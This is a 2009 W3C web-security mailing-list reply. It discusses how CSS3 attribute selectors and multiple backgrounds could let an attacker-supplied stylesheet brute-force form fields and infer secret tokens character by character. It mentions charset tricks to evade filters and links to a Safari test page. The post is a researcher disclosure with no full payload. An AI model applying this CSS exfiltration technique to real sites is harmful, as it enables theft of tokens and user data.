W3C home > Mailing lists > Public > public-web-security@w3.org > December 2009

Re: Seamless iframes + CSS3 selectors = bad idea

From: gaz Heyes <gazheyes@gmail.com>
Date: Tue, 8 Dec 2009 01:48:41 +0000
Message-ID: <252dd75b0912071748u34170413qde6b1b0ddf50277a@mail.gmail.com>
To: Daniel Glazman <daniel@glazman.org>
Cc: public-web-security@w3.org
2009/12/7 Daniel Glazman <daniel@glazman.org>

> sird@rckc.at wrote:
>
>  a[href$=.pdf]::before{content:url(pdficon.gif)}
>>
>> And it rocks, it really rocks.. but do we really want to give soooo much
>> power to CSS?
>>
>
> "we"? Who's that "we"? In the World Wide Web Consortium, that "we"
> is the Community on one hand, the W3C Membership (including browser
> vendors) on the other.
> So yes, "we" wanted to add that ability to CSS
>

The scenario is a web site allows a user to place a external stylesheet with
background rules and selectors. This could be encoded using BOM characters
or @charset 'UTF-7'; Wonderful Safari allows me to specify multiple
backgrounds for the same element, allowing me to send more than one scan of
data.

Try this with Safari 4.04:-
<http://www.businessinfo.co.uk/labs/test_files/css_fun/page_allows_css.php>

I can brute force a common field "first name", I can check what a token
starts and ends with and I can scan for which characters it contains. All
with pure CSS (no HTML). "We" (Me, Sirdarckcat and David) are not saying
this is a serious vulnerability now but it has potential to be in future.
Especially when browsers support more selectors and allow multiple
backgrounds.
Received on Tuesday, 8 December 2009 01:49:23 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Sunday, 19 December 2010 00:16:01 GMT